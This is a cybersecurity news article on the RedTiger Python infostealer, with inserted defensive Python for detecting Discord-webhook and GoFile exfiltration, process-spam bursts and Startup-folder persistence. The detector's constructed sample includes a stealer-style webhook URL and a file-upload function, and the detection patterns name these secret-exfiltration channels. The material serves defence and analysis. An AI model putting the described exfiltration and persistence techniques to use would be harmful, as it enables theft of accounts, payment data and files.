RedTiger Malware Steals Data, Discord Tokens and Even Webcam Images – Hackread – Cybersecurity News, Data Breaches, Tech, AI, Crypto and More

A new data-stealing malware called RedTiger is being used by cybercriminals to target gamers on the popular chat platform Discord. Cybersecurity firm Netskope reported the campaign last week, noting that, for now, it appears to be focused on French Discord users.

According to the researchers, RedTiger is an open-source, Python-based tool that was originally published for security testing and has since been repurposed by cybercriminals as an infostealer.

What RedTiger Steals

RedTiger primarily targets the victim's Discord account and browser databases; for Discord, it does so by injecting its own code into the desktop client. It starts with the authentication tokens (the digital keys to the account) and uses them to pull account details such as username, email address, security settings (whether MFA is enabled), and subscription level.

It also harvests payment information saved in Discord, such as credit cards and PayPal accounts. For long-term access, RedTiger modifies the Discord client itself so that it can quietly watch everything the user does. This means that even if the victim changes their Discord password, the injected code can still intercept the new credentials and the freshly issued tokens.

Beyond Discord, RedTiger also steals saved browser data (passwords and payment information), game files (e.g., Roblox), cryptocurrency wallet data, and screenshots, and it can secretly take photos with the victim's webcam. Netskope's analysis suggests the attackers are mainly targeting gamers, especially French-speaking users.

Image showing part of RedTiger’s code listing targeted applications. The script includes directories and executables for cryptocurrency wallets such as Exodus, Atomic Wallet, Binance, and Trust Wallet, along with gaming platforms like Steam and Epic Games. Each entry specifies file paths and process names that RedTiger attempts to copy or terminate to steal stored data (Image via Netskope)

Evasion and Persistence

Once a machine is infected, RedTiger collects data quickly and then conceals its activity. Exfiltration happens in two stages. First, the malware gathers everything it has stolen, compresses it into a single archive, and uploads that archive to the anonymous file-sharing service GoFile.

Second, it notifies the attacker through a Discord webhook, an automated message channel, sending the download link for the archive along with key details about the victim's computer, including IP address, country, and hostname.
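A triage check for the exfiltration path described above, written for this page as an added example (it is not Netskope's analysis code and not part of RedTiger): it scans a byte blob (an unpacked script, a memory dump, or `strings` output) for hard-coded Discord webhook URLs and GoFile upload endpoints, which together are a strong signal of exactly this "upload, then notify by webhook" pattern. The regexes encode the public URL formats of those two services and are assumptions about what a given sample contains, not indicators taken from the RedTiger sample; the blob being scanned is constructed here.

```python
import re

# Discord webhook URL format: https://discord.com/api/webhooks/<id>/<token>
# (discordapp.com and the ptb/canary hosts are also valid). The id is a numeric
# snowflake; the token is a long URL-safe string.
WEBHOOK_RE = re.compile(
    rb"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/"
    rb"(\d{17,20})/([A-Za-z0-9_\-]{60,})"
)
# GoFile API / storage hosts used for uploads. Assumption: a generic pattern for
# the service, not an indicator extracted from the RedTiger sample.
GOFILE_RE = re.compile(rb"https?://(?:api|store\d*)\.gofile\.io/[A-Za-z0-9_/]+")


def extract_exfil_iocs(blob: bytes) -> dict:
    """Pull webhook and GoFile indicators out of a byte blob."""
    webhooks = []
    for m in WEBHOOK_RE.finditer(blob):
        webhooks.append({
            "id": m.group(1).decode(),
            # keep only a prefix: the full token is a live credential
            "token_prefix": m.group(2)[:6].decode() + "...",
        })
    gofile = sorted({m.group(0).decode() for m in GOFILE_RE.finditer(blob)})
    return {"webhooks": webhooks, "gofile": gofile}


def classify(findings: dict) -> str:
    """Short verdict string for triage notes."""
    if findings["webhooks"] and findings["gofile"]:
        return "file-host exfiltration with Discord webhook notification"
    if findings["webhooks"]:
        return "Discord webhook beacon"
    if findings["gofile"]:
        return "GoFile upload"
    return "no exfiltration indicators"


# Constructed sample: a fragment shaped like a stealer's config after unpacking.
# The webhook id/token and the function names are made up for this example.
SAMPLE = b"""
WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789_-aBcDeFgHiJkLmNoPqRsTuVwXyZ0123"
def upload(path):
    server = get("https://api.gofile.io/servers")
    return post("https://store1.gofile.io/uploadFile", files={"file": open(path, "rb")})
"""

if __name__ == "__main__":
    found = extract_exfil_iocs(SAMPLE)
    print(classify(found), found)
```

Run it over the unpacked payload rather than the packed dropper, since a packed or compressed script will not expose these strings. A webhook token recovered this way is the attacker's live credential: report it to Discord for revocation and do not republish it in full.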

In their blog post, the researchers noted that the tool is built to evade detection: it shuts down immediately if it spots security tooling such as debuggers or forensic environments. To cover its tracks, RedTiger also uses a trick the researchers call "mass file and process spamming," creating about 100 randomly named files and launching roughly 400 processes at the same time. Netskope observed that this is done to "hinder forensic analysis by flooding the timeline with meaningless artifacts."
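Detection logic for that "mass file and process spamming" noise, added here as an example (it is not from the Netskope report): a sliding-window burst detector over process-creation or file-creation events, keyed by the acting process. The same function covers both the ~400-process and the ~100-file bursts the report describes, so it goes slightly beyond the text by treating them as one pattern. The event tuples, window and threshold are constructed assumptions; map them onto your own telemetry (for example Sysmon event ID 1 for process creation and ID 11 for file creation) and tune the threshold to your baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def find_bursts(events, window=timedelta(seconds=5), threshold=50):
    """Flag actors that produce `threshold` or more events inside any sliding
    window of length `window`.

    events: iterable of (timestamp: datetime, actor: str, target: str), e.g.
    (time, parent pid, child image) for process creation or
    (time, creating pid, file path) for file creation.
    """
    by_actor = defaultdict(list)
    for ts, actor, target in events:
        by_actor[actor].append((ts, target))

    hits = []
    for actor, items in by_actor.items():
        items.sort(key=lambda it: it[0])
        times = [ts for ts, _ in items]
        left, best, best_start = 0, 0, None
        for right, ts in enumerate(times):
            # advance the left edge until the span [left, right] fits in `window`
            while ts - times[left] > window:
                left += 1
            count = right - left + 1
            if count > best:
                best, best_start = count, times[left]
        if best >= threshold:
            hits.append({
                "actor": actor,
                "count": best,
                "window_start": best_start,
                "distinct_targets": len({t for _, t in items}),
            })
    return hits


# Constructed telemetry (not real logs): three normal launches from one parent,
# then ~400 launches in under 3 s from a second parent, which is the behaviour
# the report attributes to RedTiger's process spamming.
T0 = datetime(2025, 10, 20, 14, 3, 0)
SAMPLE_PROC = [(T0 + timedelta(seconds=20 * i), "pid:1204", img)
               for i, img in enumerate(["explorer.exe", "chrome.exe", "notepad.exe"])]
SAMPLE_PROC += [(T0 + timedelta(milliseconds=7 * i), "pid:5520",
                 f"C:\\Windows\\System32\\tool{i % 40}.exe") for i in range(400)]

# Constructed file-creation telemetry: ~100 random files within one second.
SAMPLE_FILES = [(T0 + timedelta(milliseconds=9 * i), "pid:5520",
                 f"C:\\Users\\victim\\AppData\\Local\\Temp\\{i:04x}.tmp") for i in range(100)]

if __name__ == "__main__":
    for hit in find_bursts(SAMPLE_PROC) + find_bursts(SAMPLE_FILES):
        print(hit)
```

The `distinct_targets` count is what separates this pattern from a legitimate burst such as a build system or an installer: hundreds of launches of many different images, or a hundred uniquely named temp files, from a single interpreter process is the shape to alert on.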

The malware also includes a persistence mechanism for Windows, Linux, and macOS (Darwin) so that it survives reboots. On Windows it is fully functional: the payload is copied into the Startup folder and runs automatically at login. On Linux and macOS the script copies itself to the auto-start folders, but this feature is currently incomplete and fails to execute because the final configuration files are never written.
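A quick persistence audit for the Startup-folder mechanism above, written as an added example (not the malware's or Netskope's code): it resolves the per-user auto-start directory for the current platform and flags every entry that is a script, binary or shortcut. The Windows path is the well-known per-user Startup folder; the page does not name the Linux and macOS directories RedTiger uses, so the `autostart` and `LaunchAgents` entries are assumptions about where to look. The sample directory built by `make_sample_dir()` is constructed for the example.

```python
import os
import sys
import tempfile
from pathlib import Path

# Extensions that make an auto-start entry worth a closer look. A .pyw file is
# the usual choice for a Python payload that must run without a console window.
SCRIPT_EXTS = {".py", ".pyw", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".sh"}
BINARY_EXTS = {".exe", ".scr", ".com", ".dll"}
SHORTCUT_EXTS = {".lnk", ".url", ".desktop", ".plist"}
BENIGN_NAMES = {"desktop.ini", ".ds_store"}


def default_startup_dirs() -> list:
    """Per-user auto-start locations for the running platform. The non-Windows
    entries are assumptions: the report does not name the exact paths."""
    home = Path.home()
    if sys.platform.startswith("win"):
        appdata = Path(os.environ.get("APPDATA", home / "AppData" / "Roaming"))
        return [appdata / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"]
    if sys.platform == "darwin":
        return [home / "Library" / "LaunchAgents"]
    return [home / ".config" / "autostart"]


def audit_startup_dir(directory) -> list:
    """Return one finding per non-benign entry, with a coarse kind label."""
    directory = Path(directory)
    findings = []
    if not directory.is_dir():
        return findings
    for entry in sorted(directory.iterdir()):
        if entry.name.lower() in BENIGN_NAMES:
            continue
        ext = entry.suffix.lower()
        if ext in SCRIPT_EXTS:
            kind = "script"
        elif ext in BINARY_EXTS:
            kind = "binary"
        elif ext in SHORTCUT_EXTS:
            kind = "shortcut"  # resolve the target before deciding
        else:
            kind = "other"
        findings.append({
            "path": str(entry),
            "kind": kind,
            "hidden": entry.name.startswith("."),
            "size": entry.stat().st_size if entry.is_file() else None,
        })
    return findings


def make_sample_dir() -> Path:
    """Constructed Startup folder: one benign marker file, one shortcut and one
    console-less Python script, the shape a dropped payload would take."""
    d = Path(tempfile.mkdtemp(prefix="startup-audit-"))
    (d / "desktop.ini").write_text("[.ShellClassInfo]\n")
    (d / "Discord.lnk").write_bytes(b"L\x00\x00\x00")
    (d / "update.pyw").write_text("import os\n")
    return d


if __name__ == "__main__":
    for startup in default_startup_dirs():
        print(startup)
        for f in audit_startup_dir(startup):
            print("  ", f["kind"], f["path"])
```

Anything of kind `script` or `binary` in a user's Startup folder deserves a hash lookup and a look at its contents; a `.lnk` needs its target resolved, since shortcuts are the normal way legitimate software registers there.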

Expert’s Analysis:

The rise of RedTiger shows a disturbing trend where legitimate tools are being turned into malicious ones. Mayank Kumar, Founding AI Engineer at DeepTempo, shared his views regarding this development, stating:

“Malicious actors can freely audit, modify, and repurpose these same legitimate tools for offensive operations… Attackers are effectively leveraging the tool’s intended capabilities for data collection and repackaging it with social engineering lures.”

This type of campaign relies on a mix of technical ability and psychological tricks, hiding the malware within seemingly harmless applications to gain access. Kumar adds that the incident is “reinforcing the critical need for multi-factor authentication (MFA) to mitigate the impact of credential theft and robust user skepticism toward unsolicited software.”

To stay safe, experts strongly recommend enabling multi-factor authentication (MFA) on Discord and other high-value accounts, and being extremely careful about downloading any new software, mods, or utilities from unverified sources.
